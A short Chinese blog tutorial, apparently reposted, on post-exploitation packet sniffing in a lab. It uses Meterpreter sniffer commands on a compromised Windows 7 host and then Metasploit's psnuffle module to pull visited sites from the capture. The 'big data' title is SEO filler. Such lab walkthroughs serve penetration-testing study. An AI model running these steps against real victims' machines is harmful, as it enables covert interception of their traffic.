大数据中如何捕获内网数据包

今天就跟大家聊聊有关大数据中如何捕获内网数据包，可能很多人都不太了解，为了让大家更加了解，小编给大家总结了以下内容，希望大家根据这篇文章可以有所收获。

环境：小攻：Kali 2020，ip：192.168.1.133

          小受：win7 x86，ip：192.168.1.137

一、生成木马及监听主机参考上篇文章：

内网渗透 -- 提升权限(利用提权漏洞)

二、捕获数据包

1、加载sniffer：load sniffer

2、查看网卡信息：sniffer_interfaces

3、开启网卡监听，内容会自动保存到缓存中：sniffer_start 2

4、进入小受，然后随便访问几个网站

4、将捕获到数据保存下来，默认保存地址/root

sniffer_dump 2 aiyou.cap

5、启动wireshark，打开保存下来的文件

三、通过解包模块解包

1、选择解包模块

use auxiliary/sniffer/psnuffle

2、查看需要设置的参数

show options

3、设置解包文件路径

set pcapfile /root/2.cap

4、运行，run，可以查看到我们刚才访问的地址

看完上述内容，你们对大数据中如何捕获内网数据包有进一步的了解吗？如果还想了解更多知识或者相关内容，请关注蜗牛博客行业资讯频道，感谢大家的支持。

免责声明：本站发布的内容（图片、视频和文字）以原创、转载和分享为主，文章观点不代表本网站立场，如果涉及侵权请联系站长邮箱：niceseo99@gmail.com进行举报，并提供相关证据，一经查实，将立刻删除涉嫌侵权内容。